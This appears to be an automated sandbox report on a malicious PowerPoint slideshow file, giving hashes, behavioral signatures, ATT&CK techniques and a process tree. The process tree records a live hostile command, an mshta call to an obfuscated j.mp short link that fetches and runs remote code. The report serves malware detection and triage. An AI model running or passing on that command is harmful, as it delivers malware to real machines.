Analysis

  • max time kernel
    146s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    05-03-2021 05:43

General

  • Target

    a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps

  • Size

    141KB

  • MD5

    53f09cdb89620ee0d02c006d5bdf758f

  • SHA1

    caf1ff6f5563d23eac7c547f2309c0608ae3029f

  • SHA256

    a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca

  • SHA512

    60374ee268f24ce193c860caf5ccf779a94388f44923bf2ecd5ba3273dfe937c4d8f960cdd906f56eccd39a81623636a2b07c22f116de8f1ee48cbe5f89b8a94

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:984
    • C:\Windows\SYSTEM32\mSHtA.exe
      mSHtA http://12384928198391823%12384928198391823@j.mp/akawdowdkwoapdlwnduhand
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Checks processor information in registry
      • Suspicious use of SetWindowsHookEx
      PID:1244
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 1244 -s 2588
        3⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2712
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:2056
    • C:\Program Files\Microsoft Office\Root\Office16\winword.exe
      winword
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:1492

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
    MD5

    50308e654d10f196ff97f70c8ae32be8

    SHA1

    44af0ff1918b729945b6b7052250f13cfe2e154a

    SHA256

    bb4aa4afd64c31f895454eb788ddab2d6da854e80b59d55822cd7beb6b3d0ccb

    SHA512

    ba8f253774cb7438361a48f4e671a0417ae450095f062761e6a4bd5f9a422f4276af28ec3ab7135db24843600276fb7fa41284753bc6feda6aeb22ac45ad32a4

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
    MD5

    37f36f73f12f6bc33e6626852def24a2

    SHA1

    db33554321fcc997d79622d0885db84ec73893cb

    SHA256

    b0189497d991bfd745a8cad8536f3b2c7307c324beacaba3fd3cf0cdc3133c58

    SHA512

    72264ae3e28d3eff0c3569fb26a2aa5baf68675f28384f81face16a0d9fbab52fe49771ea575a448154d02c357a08f5f9d2281913ef0b79ae2bdf307a5f75712

  • memory/984-18-0x00007FF90A2A0000-0x00007FF90BE7D000-memory.dmp
    Filesize

    27.9MB

  • memory/984-21-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp
    Filesize

    64KB

  • memory/984-6-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp
    Filesize

    64KB

  • memory/984-5-0x00007FF909C60000-0x00007FF90A297000-memory.dmp
    Filesize

    6.2MB

  • memory/984-22-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp
    Filesize

    64KB

  • memory/984-4-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp
    Filesize

    64KB

  • memory/984-3-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp
    Filesize

    64KB

  • memory/984-2-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp
    Filesize

    64KB

  • memory/984-19-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp
    Filesize

    64KB

  • memory/984-20-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp
    Filesize

    64KB

  • memory/1244-7-0x0000000000000000-mapping.dmp
  • memory/1492-9-0x0000000000000000-mapping.dmp
  • memory/1492-13-0x00007FF909C60000-0x00007FF90A297000-memory.dmp
    Filesize

    6.2MB

  • memory/2056-8-0x0000000000000000-mapping.dmp
  • memory/2712-15-0x0000020C132B0000-0x0000020C132B1000-memory.dmp
    Filesize

    4KB